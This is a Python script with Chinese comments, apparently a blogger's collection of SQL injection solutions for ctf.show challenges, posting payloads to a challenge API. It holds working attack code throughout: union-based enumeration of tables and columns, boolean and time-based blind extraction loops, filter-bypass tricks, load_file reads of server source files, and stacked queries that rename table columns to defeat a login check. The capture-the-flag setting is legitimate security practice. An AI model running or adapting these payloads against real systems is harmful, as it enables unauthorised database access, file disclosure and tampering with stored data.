import requests
import time
s = requests.session()
#空格 = %09 %0c 注释符 = %23
#substr(string string,num start,num length);string为字符串;start为起始位置;length为长度。
#?id='or(mid(username,1,1)='f')and'1'='1
#MID(column_name,start[,length])column_name:必需。要提取字符的字段。start:必需。规定开始位置(起始值是 1)。length:可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。
#left ( string, n ) string为要截取的字符串,n为长度。
#--------------------------------------------------------------
#默认
#1' or 1=1 --+
#1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
#1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+
#1' union select id,username,password from ctfshow_user --+
#base64绕过正则检查 to_base64(username)
#--------------------------------------------------------------
url = "http://03b68bbd-6cd9-4c07-871a-2c73ac3c7b9b.challenge.ctf.show:8080/api/"
#POST:
data= {'username':'','password':1}
#--------------------------------------------------------------
flag= ""
#flag= "ctfshow"
#dirt= "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-=_"
dirt= "0123456789abcdefghijklmnopqrstuvwxyz{}-"
#--------------------------------------------------------------
#过滤[0-9]
def trueNum(n):
num = 'true'
if n == 1:
return 'true'
else:
for i in range(n-1):
num += "+true"
return num
#--------------------------------------------------------------
#locate查找文件位置
def getIndex():
start = 1
end = 300
mid = (start + end) >> 1
while start < end :
mid = (start + end) >> 1
data['username'] = "if(locate('ctfshow',load_file('/var/www/html/api/index.php'))>{0},0,1)".format(str(mid))
res = requests.post(url,data=data)
if "密码错误" in res.json()['msg']:
start = mid + 1
else:
end = mid
return mid
#--------------------------------------------------------------
#获取FLAG(会报错,请重启)
def getFlag(num):
flag= ""
dirt= "0123456789abcdefghijklmnopqrstuvwxyz{}-"
for i in range(int(num)+1, int(num)+46):
for j in dirt:
data['username'] = 'if(ascii(substr(load_file("/var/www/html/api/index.php"),%d,1))!=%d,0,1)' % (i, ord(j))
res = requests.post(url,data=data)
if "密码错误" != res.json()['msg']:
flag += j
print(flag)
break
#getFlag(getIndex())
#--------------------------------------------------------------
#for i in range(1,100):
#for i in range(1,46):
# for j in dirt:
# x = ord(j)
# y = ascii(j)
# first = 32
# tail = 127
# while first < tail:
# mid = (first + tail) >> 1
for i in range(100):
if i == 0:
a = time.time()
#--------------------------------------------------------------
#GET
#盲注
# payload = '''1' and substr((select password from ctfshow_user4 where username = "flag"),{},1)="{}"--+'''.format(i,j)
#时间
# payload = '''1' and if(substr((select password from ctfshow_user5 where username = "flag"),{},1)="{}",sleep(3),0)--+'''.format(i,j)
# payload = (url+payload)
#POST
#flag = "ctf" ,range(3,46)$user_count = 1;
# data['tableName'] = "(ctfshow_user)where(left(pass,{}))like'{}'".format(i,flag+j)
#过滤:preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
#flag = "ctfshow" ,range(8,46)$user_count = 43;
# data['tableName'] = f"ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{i},1)regexp(char()))"
#过滤:[0-9]
# data['tableName'] = f"ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{trueNum(i)},{trueNum(1)})regexp(char({trueNum(x)})))"
# data['username'] = f"admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},1,2)=1#"
# data['username'] = f"admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))>{mid},1,2)=1#"
# data['username'] = f"admin' and if(ascii(substr((select concat(f1ag) from ctfshow_fl0g),{i},1))>{mid},1,2)=1#"
#过滤 ascill
# data['username'] = f"admin' and if(ord(substr((select concat(f1ag) from ctfshow_fl0g),{i},1))>{mid},1,2)=1#"
#过滤 ascill,ord,hex
# data['username'] = f"admin' and if(substr((select concat(f1ag) from ctfshow_fl0g),{i},1)regexp('{j}'),1,2)=1#"
#过滤 substr
# data['username'] = f"admin' and if((select concat(f1ag) from ctfshow_flxg) like '{flag + j + '%'}',1,0)#"
#'/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set//i'修改字段 id 为 pass,修改 pass 为 id ,这样登录时查询到的就是原来的id了,然后爆破id就可以了
data['username'] = '0;alter table ctfshow_user change column `pass` `ppp` varchar(255);' \
'alter table ctfshow_user change column `id` `pass` varchar(255);' \
'alter table ctfshow_user change column `ppp` `id` varchar(255);'
data['password'] = f'{i}'
#--------------------------------------------------------------
#GET
# res = requests.get(payload)
# print(payload)
#POST
res = requests.post(url,data=data)
print(data['username'])
data['username'] = '0'
data['password'] = f'{i}'
res = requests.post(url,data=data)
#--------------------------------------------------------------
# b = time.time()
# print('当前时间:',b-a,'循环=',i)
#--------------------------------------------------------------
if "登陆成功" in res.json()['msg']:
print(res.text)
break
# if 'admin' in res.text:
# if '$user_count = 43;' in res.text:
# if (b-a) >= 3:
# if "密码错误" in res.json()['msg']:
# if "登陆成功" in res.json()['msg']:
# print(res.text)
# first = mid + 1
# else:
# tail = mid
# flag = flag + chr(first)
# print(flag)
# flag += j
# print('(flag) ===== ',flag)
# break
#--------------------------------------------------------------
#堆叠注入
#就是将语句堆叠在一起进行查询,使用分号将之前的语句闭合,然后再写入一条新的语句。
#0;update`ctfshow_user`set`pass`=1
#username=0;select(1) password=1
# if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop|\(/i', $username)){
# $ret['msg']='用户名非法';
# die(json_encode($ret));
# }
#
# if($row[0]==$password){
# $ret['msg']="登陆成功 flag is $flag";
# }
#0;show tables; 来获取表名,然后password输入 ctfshow_user ,$row[0]==$password 成立,输出flag。
Python------CtfShow的sql脚本合集
共计 0 条评论,点此发表评论
